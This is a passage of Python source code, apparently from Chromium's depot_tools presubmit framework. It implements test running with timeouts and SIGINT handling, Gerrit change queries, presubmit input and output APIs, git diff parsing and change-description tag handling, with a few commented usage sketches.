# if processes passed to wait() die by SIGINT (we need to look for
# both of those cases, because pressing Ctrl+C can result in either
# the main process or one of the subprocesses getting the signal).
#
# Before a SIGINT is seen, wait(p) will simply call p.wait() and
# return the result. Once a SIGINT has been seen (in the main process
# or a subprocess, including the one the current call is waiting for),
# wait(p) will call p.terminate().
class SigintHandler(object):
sigint_returncodes = {-signal.SIGINT, # Unix
-1073741510, # Windows
}
def __init__(self):
self.__lock = threading.Lock()
self.__processes = set()
self.__got_sigint = False
self.__previous_signal = signal.signal(signal.SIGINT, self.interrupt)
def __on_sigint(self):
self.__got_sigint = True
while self.__processes:
try:
self.__processes.pop().terminate()
except OSError:
pass
def interrupt(self, signal_num, frame):
with self.__lock:
self.__on_sigint()
self.__previous_signal(signal_num, frame)
def got_sigint(self):
with self.__lock:
return self.__got_sigint
def wait(self, p, stdin):
with self.__lock:
if self.__got_sigint:
p.terminate()
self.__processes.add(p)
stdout, stderr = p.communicate(stdin)
code = p.returncode
with self.__lock:
self.__processes.discard(p)
if code in self.sigint_returncodes:
self.__on_sigint()
return stdout, stderr
sigint_handler = SigintHandler()
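# A small usage sketch of the handler above (the command itself is illustrative;
# any subprocess.Popen-compatible object works the same way):
def _run_with_sigint_handling(cmd):
    p = subprocess.Popen(cmd, stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
    # wait() registers the child with the handler, so a SIGINT seen in the main
    # process or in any tracked child results in the child being terminated.
    stdout, _ = sigint_handler.wait(p, stdin=None)
    return p.returncode, stdout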
class Timer(object):
def __init__(self, timeout, fn):
self.completed = False
self._fn = fn
self._timer = threading.Timer(timeout, self._onTimer) if timeout else None
def __enter__(self):
if self._timer:
self._timer.start()
return self
def __exit__(self, _type, _value, _traceback):
if self._timer:
self._timer.cancel()
def _onTimer(self):
self._fn()
self.completed = True
class ThreadPool(object):
def __init__(self, pool_size=None, timeout=None):
self.timeout = timeout
self._pool_size = pool_size or multiprocessing.cpu_count()
self._messages = []
self._messages_lock = threading.Lock()
self._tests = []
self._tests_lock = threading.Lock()
self._nonparallel_tests = []
def _GetCommand(self, test):
vpython = 'vpython'
if test.python3:
vpython += '3'
if sys.platform == 'win32':
vpython += '.bat'
cmd = test.cmd
if cmd[0] == 'python':
cmd = list(cmd)
cmd[0] = vpython
elif cmd[0].endswith('.py'):
cmd = [vpython] + cmd
# On Windows, scripts on the current directory take precedence over PATH, so
# that when testing depot_tools on Windows, calling `vpython.bat` will
# execute the copy of vpython of the depot_tools under test instead of the
# one in the bot.
# As a workaround, we run the tests from the parent directory instead.
if (cmd[0] == vpython and
'cwd' in test.kwargs and
os.path.basename(test.kwargs['cwd']) == 'depot_tools'):
test.kwargs['cwd'] = os.path.dirname(test.kwargs['cwd'])
cmd[1] = os.path.join('depot_tools', cmd[1])
return cmd
def _RunWithTimeout(self, cmd, stdin, kwargs):
p = subprocess.Popen(cmd, **kwargs)
with Timer(self.timeout, p.terminate) as timer:
stdout, _ = sigint_handler.wait(p, stdin)
if timer.completed:
stdout = 'Process timed out after %ss\n%s' % (self.timeout, stdout)
return p.returncode, stdout
def CallCommand(self, test):
"""Runs an external program.
This function converts invocation of .py files and invocations of 'python'
to vpython invocations.
"""
cmd = self._GetCommand(test)
try:
start = time_time()
returncode, stdout = self._RunWithTimeout(cmd, test.stdin, test.kwargs)
duration = time_time() - start
except Exception:
duration = time_time() - start
return test.message(
'%s\n%s exec failure (%4.2fs)\n%s' % (
test.name, ' '.join(cmd), duration, traceback.format_exc()))
if returncode != 0:
return test.message(
'%s\n%s (%4.2fs) failed\n%s' % (
test.name, ' '.join(cmd), duration, stdout))
if test.info:
return test.info('%s\n%s (%4.2fs)' % (test.name, ' '.join(cmd), duration))
def AddTests(self, tests, parallel=True):
if parallel:
self._tests.extend(tests)
else:
self._nonparallel_tests.extend(tests)
def RunAsync(self):
self._messages = []
def _WorkerFn():
while True:
test = None
with self._tests_lock:
if not self._tests:
break
test = self._tests.pop()
result = self.CallCommand(test)
if result:
with self._messages_lock:
self._messages.append(result)
def _StartDaemon():
t = threading.Thread(target=_WorkerFn)
t.daemon = True
t.start()
return t
while self._nonparallel_tests:
test = self._nonparallel_tests.pop()
result = self.CallCommand(test)
if result:
self._messages.append(result)
if self._tests:
threads = [_StartDaemon() for _ in range(self._pool_size)]
for worker in threads:
worker.join()
return self._messages
def normpath(path):
'''Version of os.path.normpath that also changes backward slashes to
forward slashes when not running on Windows.
'''
# This is safe to always do because the Windows version of os.path.normpath
# will replace forward slashes with backward slashes.
path = path.replace(os.sep, '/')
return os.path.normpath(path)
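# For example (on a POSIX host, where os.sep is '/'):
#   normpath('foo/./bar//baz.cc')  -> 'foo/bar/baz.cc'
#   normpath('foo/../bar/baz.cc')  -> 'bar/baz.cc'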
def _RightHandSideLinesImpl(affected_files):
"""Implements RightHandSideLines for InputApi and GclChange."""
for af in affected_files:
lines = af.ChangedContents()
for line in lines:
yield (af, line[0], line[1])
def prompt_should_continue(prompt_string):
sys.stdout.write(prompt_string)
sys.stdout.flush()
response = sys.stdin.readline().strip().lower()
return response in ('y', 'yes')
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitResult(object):
"""Base class for result objects."""
fatal = False
should_prompt = False
def __init__(self, message, items=None, long_text=''):
"""
message: A short one-line message to indicate errors.
items: A list of short strings to indicate where errors occurred.
long_text: multi-line text output, e.g. from another tool
"""
self._message = message
self._items = items or []
self._long_text = long_text.rstrip()
def handle(self):
sys.stdout.write(self._message)
sys.stdout.write('\n')
for index, item in enumerate(self._items):
sys.stdout.write(' ')
# Write separately in case it's unicode.
sys.stdout.write(str(item))
if index < len(self._items) - 1:
sys.stdout.write(' \\')
sys.stdout.write('\n')
if self._long_text:
sys.stdout.write('\n***************\n')
# Write separately in case it's unicode.
sys.stdout.write(self._long_text)
sys.stdout.write('\n***************\n')
def json_format(self):
return {
'message': self._message,
'items': [str(item) for item in self._items],
'long_text': self._long_text,
'fatal': self.fatal
}
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitError(_PresubmitResult):
"""A hard presubmit error."""
fatal = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitPromptWarning(_PresubmitResult):
"""An warning that prompts the user if they want to continue."""
should_prompt = True
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _PresubmitNotifyResult(_PresubmitResult):
"""Just print something to the screen -- but it's not even a warning."""
pass
# Top level object so multiprocessing can pickle
# Public access through OutputApi object.
class _MailTextResult(_PresubmitResult):
"""A warning that should be included in the review request email."""
def __init__(self, *args, **kwargs):
super(_MailTextResult, self).__init__()
raise NotImplementedError()
class GerritAccessor(object):
"""Limited Gerrit functionality for canned presubmit checks to work.
To avoid excessive Gerrit calls, caches the results.
"""
def __init__(self, url=None, project=None, branch=None):
self.host = urlparse.urlparse(url).netloc if url else None
self.project = project
self.branch = branch
self.cache = {}
self.code_owners_enabled = None
def _FetchChangeDetail(self, issue):
# Separate function to be easily mocked in tests.
try:
return gerrit_util.GetChangeDetail(
self.host, str(issue),
['ALL_REVISIONS', 'DETAILED_LABELS', 'ALL_COMMITS'])
except gerrit_util.GerritError as e:
if e.http_status == 404:
raise Exception('Either Gerrit issue %s doesn\'t exist, or '
'no credentials to fetch issue details' % issue)
raise
def GetChangeInfo(self, issue):
"""Returns labels and all revisions (patchsets) for this issue.
The result is a dictionary according to Gerrit REST Api.
https://gerrit-review.googlesource.com/Documentation/rest-api.html
However, the API isn't very clear about what's inside, so see the tests for an example.
"""
assert issue
cache_key = int(issue)
if cache_key not in self.cache:
self.cache[cache_key] = self._FetchChangeDetail(issue)
return self.cache[cache_key]
def GetChangeDescription(self, issue, patchset=None):
"""If patchset is none, fetches current patchset."""
info = self.GetChangeInfo(issue)
# info is a reference to the cache. We'll modify it here, adding the description
# for the right patchset if it is not yet there.
# Find revision info for the patchset we want.
if patchset is not None:
for rev, rev_info in info['revisions'].items():
if str(rev_info['_number']) == str(patchset):
break
else:
raise Exception('patchset %s doesn\'t exist in issue %s' % (
patchset, issue))
else:
rev = info['current_revision']
rev_info = info['revisions'][rev]
return rev_info['commit']['message']
def GetDestRef(self, issue):
ref = self.GetChangeInfo(issue)['branch']
if not ref.startswith('refs/'):
# NOTE: it is possible to create 'refs/x' branch,
# aka 'refs/heads/refs/x'. However, this is ill-advised.
ref = 'refs/heads/%s' % ref
return ref
def _GetApproversForLabel(self, issue, label):
change_info = self.GetChangeInfo(issue)
label_info = change_info.get('labels', {}).get(label, {})
values = label_info.get('values', {}).keys()
if not values:
return []
max_value = max(int(v) for v in values)
return [v for v in label_info.get('all', [])
if v.get('value', 0) == max_value]
def IsBotCommitApproved(self, issue):
return bool(self._GetApproversForLabel(issue, 'Bot-Commit'))
def IsOwnersOverrideApproved(self, issue):
return bool(self._GetApproversForLabel(issue, 'Owners-Override'))
def GetChangeOwner(self, issue):
return self.GetChangeInfo(issue)['owner']['email']
def GetChangeReviewers(self, issue, approving_only=True):
changeinfo = self.GetChangeInfo(issue)
if approving_only:
reviewers = self._GetApproversForLabel(issue, 'Code-Review')
else:
reviewers = changeinfo.get('reviewers', {}).get('REVIEWER', [])
return [r.get('email') for r in reviewers]
def UpdateDescription(self, description, issue):
gerrit_util.SetCommitMessage(self.host, issue, description, notify='NONE')
def IsCodeOwnersEnabledOnRepo(self):
if self.code_owners_enabled is None:
self.code_owners_enabled = gerrit_util.IsCodeOwnersEnabledOnRepo(
self.host, self.project)
return self.code_owners_enabled
class OutputApi(object):
"""An instance of OutputApi gets passed to presubmit scripts so that they
can output various types of results.
"""
PresubmitResult = _PresubmitResult
PresubmitError = _PresubmitError
PresubmitPromptWarning = _PresubmitPromptWarning
PresubmitNotifyResult = _PresubmitNotifyResult
MailTextResult = _MailTextResult
def __init__(self, is_committing):
self.is_committing = is_committing
self.more_cc = []
def AppendCC(self, cc):
"""Appends a user to cc for this change."""
self.more_cc.append(cc)
def PresubmitPromptOrNotify(self, *args, **kwargs):
"""Warn the user when uploading, but only notify if committing."""
if self.is_committing:
return self.PresubmitNotifyResult(*args, **kwargs)
return self.PresubmitPromptWarning(*args, **kwargs)
class InputApi(object):
"""An instance of this object is passed to presubmit scripts so they can
know stuff about the change they're looking at.
"""
# Method could be a function
# pylint: disable=no-self-use
# File extensions that are considered source files from a style guide
# perspective. Don't modify this list from a presubmit script!
#
# Files without an extension aren't included in the list. If you want to
# filter them as source files, add r'(^|.*?[\\\/])[^.]+$' to the allow list.
# Note that ALL CAPS files are skipped in DEFAULT_FILES_TO_SKIP below.
DEFAULT_FILES_TO_CHECK = (
# C++ and friends
r'.+\.c$', r'.+\.cc$', r'.+\.cpp$', r'.+\.h$', r'.+\.m$', r'.+\.mm$',
r'.+\.inl$', r'.+\.asm$', r'.+\.hxx$', r'.+\.hpp$', r'.+\.s$', r'.+\.S$',
# Scripts
r'.+\.js$', r'.+\.py$', r'.+\.sh$', r'.+\.rb$', r'.+\.pl$', r'.+\.pm$',
# Other
r'.+\.java$', r'.+\.mk$', r'.+\.am$', r'.+\.css$', r'.+\.mojom$',
r'.+\.fidl$'
)
# Path regexp that should be excluded from being considered containing source
# files. Don't modify this list from a presubmit script!
DEFAULT_FILES_TO_SKIP = (
r'testing_support[\\\/]google_appengine[\\\/].*',
r'.*\bexperimental[\\\/].*',
# Exclude third_party/.* but NOT third_party/{WebKit,blink}
# (crbug.com/539768 and crbug.com/836555).
r'.*\bthird_party[\\\/](?!(WebKit|blink)[\\\/]).*',
# Output directories (just in case)
r'.*\bDebug[\\\/].*',
r'.*\bRelease[\\\/].*',
r'.*\bxcodebuild[\\\/].*',
r'.*\bout[\\\/].*',
# All caps files like README and LICENCE.
r'.*\b[A-Z0-9_]{2,}$',
# SCM (can happen in dual SCM configuration). (Slightly over aggressive)
r'(|.*[\\\/])\.git[\\\/].*',
r'(|.*[\\\/])\.svn[\\\/].*',
# There is no point in processing a patch file.
r'.+\.diff$',
r'.+\.patch$',
)
# TODO(https://crbug.com/1098562): Remove once no longer used
@property
def DEFAULT_WHITE_LIST(self):
return self.DEFAULT_FILES_TO_CHECK
# TODO(https://crbug.com/1098562): Remove once no longer used
@DEFAULT_WHITE_LIST.setter
def DEFAULT_WHITE_LIST(self, value):
self.DEFAULT_FILES_TO_CHECK = value
# TODO(https://crbug.com/1098562): Remove once no longer used
@property
def DEFAULT_ALLOW_LIST(self):
return self.DEFAULT_FILES_TO_CHECK
# TODO(https://crbug.com/1098562): Remove once no longer used
@DEFAULT_ALLOW_LIST.setter
def DEFAULT_ALLOW_LIST(self, value):
self.DEFAULT_FILES_TO_CHECK = value
# TODO(https://crbug.com/1098562): Remove once no longer used
@property
def DEFAULT_BLACK_LIST(self):
return self.DEFAULT_FILES_TO_SKIP
# TODO(https://crbug.com/1098562): Remove once no longer used
@DEFAULT_BLACK_LIST.setter
def DEFAULT_BLACK_LIST(self, value):
self.DEFAULT_FILES_TO_SKIP = value
# TODO(https://crbug.com/1098562): Remove once no longer used
@property
def DEFAULT_BLOCK_LIST(self):
return self.DEFAULT_FILES_TO_SKIP
# TODO(https://crbug.com/1098562): Remove once no longer used
@DEFAULT_BLOCK_LIST.setter
def DEFAULT_BLOCK_LIST(self, value):
self.DEFAULT_FILES_TO_SKIP = value
def __init__(self, change, presubmit_path, is_committing,
verbose, gerrit_obj, dry_run=None, thread_pool=None, parallel=False):
"""Builds an InputApi object.
Args:
change: A presubmit.Change object.
presubmit_path: The path to the presubmit script being processed.
is_committing: True if the change is about to be committed.
gerrit_obj: provides basic Gerrit codereview functionality.
dry_run: if true, some Checks will be skipped.
parallel: if true, all tests reported via input_api.RunTests for all
PRESUBMIT files will be run in parallel.
"""
# Version number of the presubmit_support script.
self.version = [int(x) for x in __version__.split('.')]
self.change = change
self.is_committing = is_committing
self.gerrit = gerrit_obj
self.dry_run = dry_run
self.parallel = parallel
self.thread_pool = thread_pool or ThreadPool()
# We expose various modules and functions as attributes of the input_api
# so that presubmit scripts don't have to import them.
self.ast = ast
self.basename = os.path.basename
self.cpplint = cpplint
self.fnmatch = fnmatch
self.gclient_paths = gclient_paths
# TODO(yyanagisawa): stop exposing this when python3 becomes the default.
# Since python3's tempfile has TemporaryDirectory, we do not need this.
self.temporary_directory = gclient_utils.temporary_directory
self.glob = glob.glob
self.json = json
self.logging = logging.getLogger('PRESUBMIT')
self.os_listdir = os.listdir
self.os_path = os.path
self.os_stat = os.stat
self.os_walk = os.walk
self.re = re
self.subprocess = subprocess
self.sys = sys
self.tempfile = tempfile
self.time = time
self.unittest = unittest
if sys.version_info.major == 2:
self.urllib2 = urllib2
self.urllib_request = urllib_request
self.urllib_error = urllib_error
self.is_windows = sys.platform == 'win32'
# Set python_executable to 'vpython' in order to allow scripts in other
# repos (e.g. src.git) to automatically pick up that repo's .vpython file,
# instead of inheriting the one in depot_tools.
self.python_executable = 'vpython'
# Offer a python 3 executable for use during the migration off of python 2.
self.python3_executable = 'vpython3'
self.environ = os.environ
# InputApi.platform is the platform you're currently running on.
self.platform = sys.platform
self.cpu_count = multiprocessing.cpu_count()
# The local path of the currently-being-processed presubmit script.
self._current_presubmit_path = os.path.dirname(presubmit_path)
# We carry the canned checks so presubmit scripts can easily use them.
self.canned_checks = presubmit_canned_checks
# Temporary files we must manually remove at the end of a run.
self._named_temporary_files = []
self.owners_client = None
if self.gerrit:
self.owners_client = owners_client.GetCodeOwnersClient(
root=change.RepositoryRoot(),
upstream=change.UpstreamBranch(),
host=self.gerrit.host,
project=self.gerrit.project,
branch=self.gerrit.branch)
self.owners_db = owners_db.Database(
change.RepositoryRoot(), fopen=open, os_path=self.os_path)
self.owners_finder = owners_finder.OwnersFinder
self.verbose = verbose
self.Command = CommandData
# Replace <hash_map> and <hash_set> as headers that need to be included
# with 'base/containers/hash_tables.h' instead.
# Access to a protected member _XX of a client class
# pylint: disable=protected-access
self.cpplint._re_pattern_templates = [
(a, b, 'base/containers/hash_tables.h')
if header in ('<hash_map>', '<hash_set>') else (a, b, header)
for (a, b, header) in cpplint._re_pattern_templates
]
def SetTimeout(self, timeout):
self.thread_pool.timeout = timeout
def PresubmitLocalPath(self):
"""Returns the local path of the presubmit script currently being run.
This is useful if you don't want to hard-code absolute paths in the
presubmit script. For example, it can be used to find another file
relative to the PRESUBMIT.py script, so the whole tree can be branched and
the presubmit script still works, without editing its content.
"""
return self._current_presubmit_path
def AffectedFiles(self, include_deletes=True, file_filter=None):
"""Same as input_api.change.AffectedFiles() except only lists files
(and optionally directories) in the same directory as the current presubmit
script, or subdirectories thereof. Note that files are listed using the OS
path separator, so backslashes are used as separators on Windows.
"""
dir_with_slash = normpath('%s/' % self.PresubmitLocalPath())
if len(dir_with_slash) == 1:
dir_with_slash = ''
return list(filter(
lambda x: normpath(x.AbsoluteLocalPath()).startswith(dir_with_slash),
self.change.AffectedFiles(include_deletes, file_filter)))
def LocalPaths(self):
"""Returns local paths of input_api.AffectedFiles()."""
paths = [af.LocalPath() for af in self.AffectedFiles()]
logging.debug('LocalPaths: %s', paths)
return paths
def AbsoluteLocalPaths(self):
"""Returns absolute local paths of input_api.AffectedFiles()."""
return [af.AbsoluteLocalPath() for af in self.AffectedFiles()]
def AffectedTestableFiles(self, include_deletes=None, **kwargs):
"""Same as input_api.change.AffectedTestableFiles() except only lists files
in the same directory as the current presubmit script, or subdirectories
thereof.
"""
if include_deletes is not None:
warn('AffectedTestableFiles(include_deletes=%s)'
' is deprecated and ignored' % str(include_deletes),
category=DeprecationWarning,
stacklevel=2)
return list(filter(
lambda x: x.IsTestableFile(),
self.AffectedFiles(include_deletes=False, **kwargs)))
def AffectedTextFiles(self, include_deletes=None):
"""An alias to AffectedTestableFiles for backwards compatibility."""
return self.AffectedTestableFiles(include_deletes=include_deletes)
def FilterSourceFile(self,
affected_file,
files_to_check=None,
files_to_skip=None,
allow_list=None,
block_list=None):
"""Filters out files that aren't considered 'source file'.
If files_to_check or files_to_skip is None, InputApi.DEFAULT_FILES_TO_CHECK
and InputApi.DEFAULT_FILES_TO_SKIP is used respectively.
The lists will be compiled as regular expressions and
AffectedFile.LocalPath() needs to pass both lists.
Note: Copy-paste this function to suit your needs or use a lambda function.
"""
if files_to_check is None:
files_to_check = self.DEFAULT_FILES_TO_CHECK
if files_to_skip is None:
files_to_skip = self.DEFAULT_FILES_TO_SKIP
def Find(affected_file, items):
local_path = affected_file.LocalPath()
for item in items:
if self.re.match(item, local_path):
return True
return False
return (Find(affected_file, files_to_check) and
not Find(affected_file, files_to_skip))
def AffectedSourceFiles(self, source_file):
"""Filter the list of AffectedTestableFiles by the function source_file.
If source_file is None, InputApi.FilterSourceFile() is used.
"""
if not source_file:
source_file = self.FilterSourceFile
return list(filter(source_file, self.AffectedTestableFiles()))
def RightHandSideLines(self, source_file_filter=None):
"""An iterator over all text lines in 'new' version of changed files.
Only lists lines from new or modified text files in the change that are
contained by the directory of the currently executing presubmit script.
This is useful for doing line-by-line regex checks, like checking for
trailing whitespace.
Yields:
a 3 tuple:
the AffectedFile instance of the current file;
integer line number (1-based); and
the contents of the line as a string.
Note: The carriage return (LF or CR) is stripped off.
"""
files = self.AffectedSourceFiles(source_file_filter)
return _RightHandSideLinesImpl(files)
def ReadFile(self, file_item, mode='r'):
"""Reads an arbitrary file.
Deny reading anything outside the repository.
"""
if isinstance(file_item, AffectedFile):
file_item = file_item.AbsoluteLocalPath()
if not file_item.startswith(self.change.RepositoryRoot()):
raise IOError('Access outside the repository root is denied.')
return gclient_utils.FileRead(file_item, mode)
def CreateTemporaryFile(self, **kwargs):
"""Returns a named temporary file that must be removed with a call to
RemoveTemporaryFiles().
All keyword arguments are forwarded to tempfile.NamedTemporaryFile(),
except for |delete|, which is always set to False.
Presubmit checks that need to create a temporary file and pass it for
reading should use this function instead of NamedTemporaryFile(), as
Windows fails to open a file that is already open for writing.
with input_api.CreateTemporaryFile() as f:
f.write('xyz')
f.close()
input_api.subprocess.check_output(['script-that', '--reads-from',
f.name])
Note that callers of CreateTemporaryFile() should not worry about removing
any temporary file; this is done transparently by the presubmit handling
code.
"""
if 'delete' in kwargs:
# Prevent users from passing |delete|; we take care of file deletion
# ourselves and this prevents unintuitive error messages when we pass
# delete=False and 'delete' is also in kwargs.
raise TypeError('CreateTemporaryFile() does not take a "delete" '
'argument, file deletion is handled automatically by '
'the same presubmit_support code that creates InputApi '
'objects.')
temp_file = self.tempfile.NamedTemporaryFile(delete=False, **kwargs)
self._named_temporary_files.append(temp_file.name)
return temp_file
@property
def tbr(self):
"""Returns if a change is TBR'ed."""
return 'TBR' in self.change.tags or self.change.TBRsFromDescription()
def RunTests(self, tests_mix, parallel=True):
tests = []
msgs = []
for t in tests_mix:
if isinstance(t, OutputApi.PresubmitResult) and t:
msgs.append(t)
else:
assert issubclass(t.message, _PresubmitResult)
tests.append(t)
if self.verbose:
t.info = _PresubmitNotifyResult
if not t.kwargs.get('cwd'):
t.kwargs['cwd'] = self.PresubmitLocalPath()
self.thread_pool.AddTests(tests, parallel)
# When self.parallel is True (i.e. --parallel is passed as an option)
# RunTests doesn't actually run tests. It adds them to a ThreadPool that
# will run all tests once all PRESUBMIT files are processed.
# Otherwise, it will run them and return the results.
if not self.parallel:
msgs.extend(self.thread_pool.RunAsync())
return msgs
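# A minimal sketch of how a PRESUBMIT.py check typically consumes the API above
# (the check name, the file pattern, and the policy are illustrative only):
def CheckNoTrailingWhitespace(input_api, output_api):
    def is_python_source(affected_file):
        return input_api.FilterSourceFile(affected_file, files_to_check=[r'.+\.py$'])
    errors = []
    for af, line_num, line in input_api.RightHandSideLines(is_python_source):
        if line != line.rstrip():
            errors.append('%s:%d' % (af.LocalPath(), line_num))
    if errors:
        return [output_api.PresubmitPromptWarning(
            'Trailing whitespace found.', items=errors)]
    return []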
class _DiffCache(object):
"""Caches diffs retrieved from a particular SCM."""
def __init__(self, upstream=None):
"""Stores the upstream revision against which all diffs will be computed."""
self._upstream = upstream
def GetDiff(self, path, local_root):
"""Get the diff for a particular path."""
raise NotImplementedError()
def GetOldContents(self, path, local_root):
"""Get the old version for a particular path."""
raise NotImplementedError()
class _GitDiffCache(_DiffCache):
"""DiffCache implementation for git; gets all file diffs at once."""
def __init__(self, upstream):
super(_GitDiffCache, self).__init__(upstream=upstream)
self._diffs_by_file = None
def GetDiff(self, path, local_root):
if not self._diffs_by_file:
# Compute a single diff for all files and parse the output; with git this
# is much faster than computing one diff for each file.
diffs = {}
# Don't specify any filenames below, because there are command line length
# limits on some platforms and GenerateDiff would fail.
unified_diff = scm.GIT.GenerateDiff(local_root, files=[], full_move=True,
branch=self._upstream)
# This regex matches the path twice, separated by a space. Note that
# filename itself may contain spaces.
file_marker = re.compile('^diff --git (?P<filename>.*) (?P=filename)$')
current_diff = []
keep_line_endings = True
for x in unified_diff.splitlines(keep_line_endings):
match = file_marker.match(x)
if match:
# Marks the start of a new per-file section.
diffs[match.group('filename')] = current_diff = [x]
elif x.startswith('diff --git'):
raise PresubmitFailure('Unexpected diff line: %s' % x)
else:
current_diff.append(x)
self._diffs_by_file = dict(
(normpath(path), ''.join(diff)) for path, diff in diffs.items())
if path not in self._diffs_by_file:
raise PresubmitFailure(
'Unified diff did not contain entry for file %s' % path)
return self._diffs_by_file[path]
def GetOldContents(self, path, local_root):
return scm.GIT.GetOldContents(local_root, path, branch=self._upstream)
class AffectedFile(object):
"""Representation of a file in a change."""
DIFF_CACHE = _DiffCache
# Method could be a function
# pylint: disable=no-self-use
def __init__(self, path, action, repository_root, diff_cache):
self._path = path
self._action = action
self._local_root = repository_root
self._is_directory = None
self._cached_changed_contents = None
self._cached_new_contents = None
self._diff_cache = diff_cache
logging.debug('%s(%s)', self.__class__.__name__, self._path)
def LocalPath(self):
"""Returns the path of this file on the local disk relative to client root.
This should be used for error messages but not for accessing files,
because presubmit checks are run with CWD=PresubmitLocalPath() (which is
often != client root).
"""
return normpath(self._path)
def AbsoluteLocalPath(self):
"""Returns the absolute path of this file on the local disk.
"""
return os.path.abspath(os.path.join(self._local_root, self.LocalPath()))
def Action(self):
"""Returns the action on this opened file, e.g. A, M, D, etc."""
return self._action
def IsTestableFile(self):
"""Returns True if the file is a text file and not a binary file.
Deleted files are not text files."""
raise NotImplementedError() # Implement when needed
def IsTextFile(self):
"""An alias to IsTestableFile for backwards compatibility."""
return self.IsTestableFile()
def OldContents(self):
"""Returns an iterator over the lines in the old version of file.
The old version is the file before any modifications in the user's
workspace, i.e. the 'left hand side'.
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
return self._diff_cache.GetOldContents(self.LocalPath(),
self._local_root).splitlines()
def NewContents(self):
"""Returns an iterator over the lines in the new version of file.
The new version is the file in the user's workspace, i.e. the 'right hand
side'.
Contents will be empty if the file is a directory or does not exist.
Note: The carriage returns (LF or CR) are stripped off.
"""
if self._cached_new_contents is None:
self._cached_new_contents = []
try:
self._cached_new_contents = gclient_utils.FileRead(
self.AbsoluteLocalPath(), 'rU').splitlines()
except IOError:
pass # File not found? That's fine; maybe it was deleted.
except UnicodeDecodeError as e:
# log the filename since we're probably trying to read a binary
# file, and shouldn't be.
print('Error reading %s: %s' % (self.AbsoluteLocalPath(), e))
raise
return self._cached_new_contents[:]
def ChangedContents(self, keeplinebreaks=False):
"""Returns a list of tuples (line number, line text) of all new lines.
This relies on the scm diff output describing each changed code section
with a line of the form
^@@ <old line num>,<old size> <new line num>,<new size> @@$
"""
# Don't return cached results when line breaks are requested.
if not keeplinebreaks and self._cached_changed_contents is not None:
return self._cached_changed_contents[:]
result = []
line_num = 0
# The keeplinebreaks parameter to splitlines must be True or else the
# CheckForWindowsLineEndings presubmit will be a NOP.
for line in self.GenerateScmDiff().splitlines(keeplinebreaks):
m = re.match(r'^@@ [0-9\,\+\-]+ \+([0-9]+)\,[0-9]+ @@', line)
if m:
line_num = int(m.groups(1)[0])
continue
if line.startswith('+') and not line.startswith('++'):
result.append((line_num, line[1:]))
if not line.startswith('-'):
line_num += 1
# Don't cache results with line breaks.
if keeplinebreaks:
return result
self._cached_changed_contents = result
return self._cached_changed_contents[:]
def __str__(self):
return self.LocalPath()
def GenerateScmDiff(self):
return self._diff_cache.GetDiff(self.LocalPath(), self._local_root)
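# A standalone illustration of the hunk-header parsing used by ChangedContents
# above (the sample header line is made up):
_SAMPLE_HUNK = '@@ -10,4 +12,5 @@ def foo():'
_m = re.match(r'^@@ [0-9\,\+\-]+ \+([0-9]+)\,[0-9]+ @@', _SAMPLE_HUNK)
assert _m and int(_m.group(1)) == 12  # 12 is the first line number on the new side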
class GitAffectedFile(AffectedFile):
"""Representation of a file in a change out of a git checkout."""
# Method 'NNN' is abstract in class 'NNN' but is not overridden
# pylint: disable=abstract-method
DIFF_CACHE = _GitDiffCache
def __init__(self, *args, **kwargs):
AffectedFile.__init__(self, *args, **kwargs)
self._server_path = None
self._is_testable_file = None
def IsTestableFile(self):
if self._is_testable_file is None:
if self.Action() == 'D':
# A deleted file is not testable.
self._is_testable_file = False
else:
self._is_testable_file = os.path.isfile(self.AbsoluteLocalPath())
return self._is_testable_file
class Change(object):
"""Describe a change.
Used directly by the presubmit scripts to query the current change being
tested.
Instance members:
tags: Dictionary of KEY=VALUE pairs found in the change description.
self.KEY: equivalent to tags['KEY']
"""
_AFFECTED_FILES = AffectedFile
# Matches key/value (or 'tag') lines in changelist descriptions.
TAG_LINE_RE = re.compile(
'^[ \t]*(?P<key>[A-Z][A-Z_0-9]*)[ \t]*=[ \t]*(?P<value>.*?)[ \t]*$')
scm = ''
def __init__(
self, name, description, local_root, files, issue, patchset, author,
upstream=None):
if files is None:
files = []
self._name = name
# Convert root into an absolute path.
self._local_root = os.path.abspath(local_root)
self._upstream = upstream
self.issue = issue
self.patchset = patchset
self.author_email = author
self._full_description = ''
self.tags = {}
self._description_without_tags = ''
self.SetDescriptionText(description)
assert all(
(isinstance(f, (list, tuple)) and len(f) == 2) for f in files), files
diff_cache = self._AFFECTED_FILES.DIFF_CACHE(self._upstream)
self._affected_files = [
self._AFFECTED_FILES(path, action.strip(), self._local_root, diff_cache)
for action, path in files
]
def UpstreamBranch(self):
"""Returns the upstream branch for the change."""
return self._upstream
def Name(self):
"""Returns the change name."""
return self._name
def DescriptionText(self):
"""Returns the user-entered changelist description, minus tags.
Any line in the user-provided description starting with e.g. 'FOO='
(whitespace permitted before and around) is considered a tag line. Such
lines are stripped out of the description this function returns.
"""
return self._description_without_tags
def FullDescriptionText(self):
"""Returns the complete changelist description including tags."""
return self._full_description
def SetDescriptionText(self, description):
"""Sets the full description text (including tags) to |description|.
Also updates the list of tags."""
self._full_description = description
# From the description text, build up a dictionary of key/value pairs
# plus the description minus all key/value or 'tag' lines.
description_without_tags = []
self.tags = {}
for line in self._full_description.splitlines():
m = self.TAG_LINE_RE.match(line)
if m:
self.tags[m.group('key')] = m.group('value')
else:
description_without_tags.append(line)
# Change back to text and remove whitespace at end.
self._description_without_tags = (
'\n'.join(description_without_tags).rstrip())
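# Illustrative sketch, not part of the original class: for a description such
# as 'Fix crash on startup\nBUG=1234\nR=dev@example.org' (the values are made
# up), DescriptionText() returns 'Fix crash on startup' and self.tags becomes
# {'BUG': '1234', 'R': 'dev@example.org'}.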
def AddDescriptionFooter(self, key, value):
"""Adds the given footer to the change description.
Args:
key: A string with the key for the git footer. It must conform to
the git footers format (i.e. 'List-Of-Tokens') and will be case
normalized so that each token is title-cased.
value: A string with the value for the git footer.
"""
description = git_footers.add_footer(
self.FullDescriptionText(), git_footers.normalize_name(key), value)
self.SetDescriptionText(description)
def RepositoryRoot(self):
"""Returns the repository (checkout) root directory for this change,
as an absolute path.
"""
return self._local_root
def __getattr__(self, attr):
"""Return tags directly as attributes on the object."""
